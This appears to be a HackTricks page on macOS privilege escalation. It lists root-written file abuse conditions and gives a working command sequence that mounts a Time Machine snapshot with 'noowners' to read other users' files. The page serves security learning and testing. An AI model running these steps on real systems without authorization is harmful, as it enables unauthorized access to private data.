macOS Security & Privilege Escalation
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
🞠Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
If you are not familiar with macOS, you should start learning the basics of macOS:
- Special macOS files & permissions:
- Common macOS users
- AppleFS
- The architecture of the kernel
- Common macOS network services & protocols
In companies macOS systems are highly probably going to be managed with a MDM. Therefore, from the perspective of an attacker is interesting to know how that works:
If a process running as root writes a file that can be controlled by a user, the user could abuse this to escalate privileges.
This could occur in the following situations:
- File used was already created by a user (owned by the user)
- File used is writable by the user because of a group
- File used is inside a directory owned by the user (the user could create the file)
- File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file)
Being able to create a file that is going to be used by root, allows a user to take advantage of its content or even create symlinks/hardlinks to point it to another place.
For this kind of vulnerabilities don't forget to check vulnerable
.pkg installers:Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols
Any user (even unprivileged ones) can create and mount a time machine snapshot an access ALL the files of that snapshot.
The only privileged needed is for the application used (like
Terminal) to have Full Disk Access (FDA) access (kTCCServiceSystemPolicyAllfiles) which need to be granted by an admin.# Create snapshot
tmutil localsnapshot
​
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
​
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
​
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
​
# Access it
ls /tmp/snap/Users/admin_user # This will work
First of all, please note that most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS machines. So see:
🞠Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!